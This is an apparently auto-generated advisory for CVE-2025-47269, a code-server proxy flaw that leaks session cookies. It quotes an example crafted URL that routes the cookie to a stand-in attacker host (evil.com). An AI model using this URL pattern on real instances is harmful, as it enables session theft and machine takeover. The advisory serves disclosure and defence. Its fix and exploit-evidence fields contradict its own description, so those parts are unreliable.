CVE-2025-47269: code-server session cookie can be extracted by having user visit specially crafted proxy URL

Advisory generated from the CVE record, CISA, Exploit Observer and VEDAS: what it is, whether it is exploited, who is affected, and how to fix and detect it.

Generated by VEDAS. Scores as of 2026-11-01 19:19 UTC. Rebuilt every few hours from cve-scores, CISA KEV and vedas-signatures. How this works and its limits.

What it is

code-server runs VS Code on any machine anywhere through browser access. Prior to version 4.99.4, a maliciously crafted URL using the proxy subpath can result in the attacker gaining access to the session token. Failure to properly validate the port for a proxy request can result in proxying to an arbitrary domain. The malicious URL `https://<code-server>/proxy/test@evil.com/path` would be proxied to `test@evil.com/path` where the attacker could exfiltrate a user’s session token. Any user who runs code-server with the built-in proxy enabled and clicks on maliciously crafted links that go to their code-server instances with reference to /proxy. Normally this is used to proxy local ports, however the URL can reference the attacker’s domain instead, and the connection is then proxied to that domain, which will include sending cookies. With access to the session cookie, the attacker can then log into code-server and have full access to the machine hosting code-server as the user running code-server. This issue has been patched in version 4.99.4.

Description quoted from the CVE record (assigned by GitHub_M, published 2025-05-09).

Weakness: CWE-441: Unintended Proxy or Intermediary (‘Confused Deputy’)

How it can be exploited

Exploitable over the network with low attack complexity needing no privileges and a user must take an action. Impact: confidentiality high, integrity high, availability low. CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L

CISA assessment (SSVC): CISA has no evidence of exploitation. Automatable: no. Technical impact: total.

Public exploit evidence (Exploit Observer)

Also known as: CNNVD-202505-1475, EUVD-2025-14189, GHSA-p483-wpfp-42cj, SNYK-JS-CODESERVER-10118297

VEDAS cluster: VEDAS:CHILICHERUB

Exploit Observer has no public exploit code that names this CVE or one of its aliases.

Vulnerability databases and vendor advisories (7)

Catalogue entries, not exploit evidence.

4 more references returned by Exploit Observer did not name this CVE or an alias, so they are left out.

VEDAS data as of 2026-11-01T17:12 UTC; fetched 2026-11-02.

Live scores

EPSS
0.563
very likely to be attacked soon
VEDAS
0.965
strong exploit evidence
On CISA KEV
Not listed
Detection rule
None yet

Who is affected

ProductAffectedNot affected
coder code-serverversion < 4.99.4Not stated

Version ranges exactly as the CVE record states them. “Before X” means X is the first fixed version.

Exploit Observer also maps it to: npm code-server.

How to fix it

No fixed version or vendor advisory is listed in the CVE record yet. Watch the vendor’s security page.

How to detect it

There is no open VEDAS detection rule for this bug yet. It is listed on the detection gaps page if CISA has confirmed attacks.

References

Other references

Other databases

Where this comes from

This advisory is generated automatically by VEDAS from: CVE.org record, cve-scores (EPSS and VEDAS), Exploit Observer. Text in quotes is reproduced from the source; everything else is a fixed template filled with source fields. Nothing here is written by a language model. Check the vendor advisory before acting, and read how VEDAS and Exploit Observer work, and their limits.